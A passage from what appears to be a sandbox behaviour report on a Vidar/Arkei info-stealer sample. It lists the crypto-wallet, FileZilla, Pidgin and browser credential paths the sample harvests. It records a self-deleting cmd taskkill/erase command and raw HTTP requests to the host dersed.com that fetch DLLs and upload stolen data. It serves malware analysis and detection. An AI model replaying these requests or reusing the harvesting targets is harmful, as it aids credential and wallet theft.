  832. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
  833.  
  834.  
  835. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
  836.  
  837.  
  838. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DigitalCoin\\"
  839.  
  840.  
  841. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DigitalCoin\\*.*"
  842.  
  843.  
  844. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
  845.  
  846.  
  847. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
  848.  
  849.  
  850. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MinCoin\\"
  851.  
  852.  
  853. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MinCoin\\*.*"
  854.  
  855.  
  856. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
  857.  
  858.  
  859. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
  860.  
  861.  
  862. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\\n"
  863.  
  864.  
  865. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
  866.  
  867.  
  868. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
  869.  
  870.  
  871. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\YACoin\\"
  872.  
  873.  
  874. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\YACoin\\*.*"
  875.  
  876.  
  877. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
  878.  
  879.  
  880. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FlorinCoin\\*.*"
  881.  
  882.  
  883. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
  884.  
  885.  
  886. "file": "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FlorinCoin\\"
  887.  
  888.  
  889.  
  890.  
  891. "Description": "Harvests credentials from local FTP client software",
  892. "Details":
  893.  
  894. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  895.  
  896.  
  897.  
  898.  
  899. "Description": "Harvests information related to installed instant messenger clients",
  900. "Details":
  901.  
  902. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  903.  
  904.  
  905.  
  906.  
  907. "Description": "Collects information to fingerprint the system",
  908. "Details":
  909.  
  910.  
  911. "Description": "Created network traffic indicative of malicious activity",
  912. "Details":
  913.  
  914. "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
  915.  
  916.  
  917.  
  918.  
  919. "Description": "Uses suspicious command line tools or Windows utilities",
  920. "Details":
  921.  
  922. "command": "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit"
  923.  
  924.  
  925. "command": "C:\\Windows\\System32\\cmd.exe /c taskkill /im 8JB5A.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe & exit"
  926.  
  927.  
  928. "command": "taskkill /im 8JB5A.exe /f"
  929.  
  930.  
  931.  
  932.  
  933.  
  934. * Started Service:
  935. "VaultSvc"
  936.  
  937.  
  938. * Mutexes:
  939. "Global\\CLR_PerfMon_WrapMutex",
  940. "Global\\CLR_CASOFF_MUTEX",
  941. "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963",
  942. "Global\\ADAP_WMI_ENTRY",
  943. "Global\\RefreshRA_Mutex",
  944. "Global\\RefreshRA_Mutex_Lib",
  945. "Global\\RefreshRA_Mutex_Flag"
  946.  
  947.  
  948. * Modified Files:
  949. "C:\\Users\\user\\AppData\\Local\\GDIPFONTCACHEV1.DAT",
  950. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\passwords.txt",
  951. "C:\\ProgramData\\freebl3.dll",
  952. "C:\\ProgramData\\mozglue.dll",
  953. "C:\\ProgramData\\msvcp140.dll",
  954. "C:\\ProgramData\\nss3.dll",
  955. "C:\\ProgramData\\softokn3.dll",
  956. "C:\\ProgramData\\vcruntime140.dll",
  957. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\ld",
  958. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\historych",
  959. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\History\\Google Chrome_Default.txt",
  960. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Downloads\\Google Chrome_Default.txt",
  961. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\c",
  962. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Google Chrome_Default.txt",
  963. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\wd",
  964. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Autofill\\Google Chrome_Default.txt",
  965. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\CC\\Google Chrome_Default.txt",
  966. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Soft\\Authy\\\\xef\\x94\\x98Q\\xc9\\x86",
  967. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\IE_Cookies.txt",
  968. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Edge_Cookies.txt",
  969. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\cookie_list.txt",
  970. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\information.txt",
  971. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Bitcoin\\\\x12",
  972. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Ethereum\\",
  973. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Electrum\\\n",
  974. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectrumLTC\\",
  975. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Exodus\\\n",
  976. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Exodus\\",
  977. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectronCash\\",
  978. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MultiDoge\\\n",
  979. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Zcash\\",
  980. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DashCore\\",
  981. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Litecoin\\",
  982. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Anoncoin\\",
  983. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\BBQCoin\\",
  984. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DevCoin\\",
  985. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DigitalCoin\\",
  986. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FlorinCoin\\",
  987. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Franko\\",
  988. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FreiCoin\\",
  989. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\GoldCoinGLD\\\n",
  990. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\InfiniteCoin\\",
  991. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IOCoin\\",
  992. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IxCoin\\",
  993. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MegaCoin\\",
  994. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MinCoin\\",
  995. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\NameCoin\\",
  996. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\PrimeCoin\\",
  997. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\TerraCoin\\",
  998. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\YACoin\\",
  999. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\JAXX\\",
  1000. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\screenshot.jpg",
  1001. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\US_00000000-0000-0000-0000-0000000000002566241227.zip",
  1002. "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
  1003. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
  1004. "\\Device\\LanmanDatagramReceiver",
  1005. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
  1006.  
  1007.  
  1008. * Deleted Files:
  1009. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.1732.26820656",
  1010. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1732.26820671",
  1011. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1732.26820671",
  1012. "C:\\ProgramData\\freebl3.dll",
  1013. "C:\\ProgramData\\mozglue.dll",
  1014. "C:\\ProgramData\\msvcp140.dll",
  1015. "C:\\ProgramData\\nss3.dll",
  1016. "C:\\ProgramData\\softokn3.dll",
  1017. "C:\\ProgramData\\vcruntime140.dll",
  1018. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Autofill\\Google Chrome_Default.txt",
  1019. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Autofill",
  1020. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\CC\\Google Chrome_Default.txt",
  1021. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\CC",
  1022. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Edge_Cookies.txt",
  1023. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\Google Chrome_Default.txt",
  1024. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies\\IE_Cookies.txt",
  1025. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Cookies",
  1026. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\cookie_list.txt",
  1027. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Downloads\\Google Chrome_Default.txt",
  1028. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Downloads",
  1029. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\History\\Google Chrome_Default.txt",
  1030. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\History",
  1031. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\information.txt",
  1032. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\passwords.txt",
  1033. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\screenshot.jpg",
  1034. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Soft\\Authy",
  1035. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Soft",
  1036. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Anoncoin",
  1037. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\BBQCoin",
  1038. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Bitcoin",
  1039. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DashCore",
  1040. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DevCoin",
  1041. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\DigitalCoin",
  1042. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectronCash",
  1043. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Electrum",
  1044. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\ElectrumLTC",
  1045. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Ethereum",
  1046. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Exodus",
  1047. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FlorinCoin",
  1048. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Franko",
  1049. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\FreiCoin",
  1050. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\GoldCoinGLD",
  1051. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\InfiniteCoin",
  1052. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IOCoin",
  1053. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\IxCoin",
  1054. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\JAXX",
  1055. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Litecoin",
  1056. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MegaCoin",
  1057. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MinCoin",
  1058. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\MultiDoge",
  1059. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\NameCoin",
  1060. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\PrimeCoin",
  1061. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\TerraCoin",
  1062. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\YACoin",
  1063. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets\\Zcash",
  1064. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\files\\Wallets",
  1065. "C:\\ProgramData\\L5ZC0BGQBFIADFYZ5XY692BDJ\\US_00000000-0000-0000-0000-0000000000002566241227.zip",
  1066. "C:\\Users\\user\\AppData\\Local\\Temp\\8JB5A.exe",
  1067. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
  1068.  
  1069.  
  1070. * Modified Registry Keys:
  1071. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\ED0D73D7-BC97-46E2-AC55-FD6EB3F72C05\\DynamicInfo",
  1072. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\633E54B2-2944-4AC4-90FA-C69D6C08EDCB",
  1073. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\B17E070E-57E3-43F6-96F5-A9A9C921DEBF\\DynamicInfo",
  1074. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\55EB258C-A9EA-4DA4-A8EF-E736F5A950CE",
  1075. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\DF000DCA-3FA2-48A6-9E59-C0606F9F8D73\\DynamicInfo",
  1076. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\C47FF73B-279F-4D5D-8B65-FD7750272025",
  1077. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\67AD5638-AA7B-49DE-8A67-3D392C370D2A",
  1078. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\633E54B2-2944-4AC4-90FA-C69D6C08EDCB\\data",
  1079. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\55EB258C-A9EA-4DA4-A8EF-E736F5A950CE\\data",
  1080. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\C47FF73B-279F-4D5D-8B65-FD7750272025\\data",
  1081. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\67AD5638-AA7B-49DE-8A67-3D392C370D2A\\data"
  1082.  
  1083.  
  1084. * Deleted Registry Keys:
  1085.  
  1086. * DNS Communications:
  1087.  
  1088. "type": "A",
  1089. "request": "dersed.com",
  1090. "answers":
  1091.  
  1092. "data": "104.200.67.209",
  1093. "type": "A"
  1094.  
  1095.  
  1096.  
  1097.  
  1098. "type": "A",
  1099. "request": "ip-api.com",
  1100. "answers":
  1101.  
  1102. "data": "72.11.140.50",
  1103. "type": "A"
  1104.  
  1105.  
  1106. "data": "66.212.29.250",
  1107. "type": "A"
  1108.  
  1109.  
  1110.  
  1111.  
  1112.  
  1113. * Domains:
  1114.  
  1115. "ip": "104.200.67.209",
  1116. "domain": "dersed.com"
  1117.  
  1118.  
  1119. "ip": "72.11.140.50",
  1120. "domain": "ip-api.com"
  1121.  
  1122.  
  1123.  
  1124. * Network Communication - ICMP:
  1125.  
  1126. * Network Communication - HTTP:
  1127.  
  1128. "count": 1,
  1129. "body": "--1BEF0A57BE110FD467A--\r\n",
  1130. "uri": "http://dersed.com/288",
  1131. "user-agent": "",
  1132. "method": "POST",
  1133. "host": "dersed.com",
  1134. "version": "1.1",
  1135. "path": "/288",
  1136. "data": "POST /288 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  1137. "port": 80
  1138.  
  1139.  
  1140. "count": 1,
  1141. "body": "",
  1142. "uri": "http://dersed.com/freebl3.dll",
  1143. "user-agent": "",
  1144. "method": "GET",
  1145. "host": "dersed.com",
  1146. "version": "1.1",
  1147. "path": "/freebl3.dll",
  1148. "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1149. "port": 80
  1150.  
  1151.  
  1152. "count": 1,
  1153. "body": "",
  1154. "uri": "http://dersed.com/mozglue.dll",
  1155. "user-agent": "",
  1156. "method": "GET",
  1157. "host": "dersed.com",
  1158. "version": "1.1",
  1159. "path": "/mozglue.dll",
  1160. "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1161. "port": 80
  1162.  
  1163.  
  1164. "count": 1,
  1165. "body": "",
  1166. "uri": "http://dersed.com/msvcp140.dll",
  1167. "user-agent": "",
  1168. "method": "GET",
  1169. "host": "dersed.com",
  1170. "version": "1.1",
  1171. "path": "/msvcp140.dll",
  1172. "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1173. "port": 80
  1174.  
  1175.  
  1176. "count": 1,
  1177. "body": "",
  1178. "uri": "http://dersed.com/nss3.dll",
  1179. "user-agent": "",
  1180. "method": "GET",
  1181. "host": "dersed.com",
  1182. "version": "1.1",
  1183. "path": "/nss3.dll",
  1184. "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1185. "port": 80
  1186.  
  1187.  
  1188. "count": 1,
  1189. "body": "",
  1190. "uri": "http://dersed.com/softokn3.dll",
  1191. "user-agent": "",
  1192. "method": "GET",
  1193. "host": "dersed.com",
  1194. "version": "1.1",
  1195. "path": "/softokn3.dll",
  1196. "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1197. "port": 80
  1198.  
  1199.  
  1200. "count": 1,
  1201. "body": "",
  1202. "uri": "http://dersed.com/vcruntime140.dll",
  1203. "user-agent": "",
  1204. "method": "GET",
  1205. "host": "dersed.com",
  1206. "version": "1.1",
  1207. "path": "/vcruntime140.dll",
  1208. "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1209. "port": 80
  1210.  
  1211.  
  1212. "count": 2,
  1213. "body": "--1BEF0A57BE110FD467A--\r\n",
  1214. "uri": "http://ip-api.com/line/",
  1215. "user-agent": "",
  1216. "method": "POST",
  1217. "host": "ip-api.com",
  1218. "version": "1.1",
  1219. "path": "/line/",
  1220. "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  1221. "port": 80
  1222.  
  1223.  
  1224. "count": 1,
  1225. "body": "",
  1226. "uri": "http://dersed.com/",
  1227. "user-agent": "",
  1228. "method": "POST",
  1229. "host": "dersed.com",
  1230. "version": "1.1",
  1231. "path": "/",
  1232. "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40452\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
  1233. "port": 80
  1234.  
  1235.  
  1236.  
  1237. * Network Communication - SMTP:
  1238.  
  1239. * Network Communication - Hosts:
  1240.  
  1241. "country_name": "United States",
  1242. "ip": "72.11.140.50",
  1243. "inaddrarpa": "",
  1244. "hostname": "ip-api.com"
  1245.  
  1246.  
  1247. "country_name": "United States",
  1248. "ip": "104.200.67.209",
  1249. "inaddrarpa": "",
  1250. "hostname": "dersed.com"
  1251.  
  1252.  
  1253.  
  1254. * Network Communication - IRC: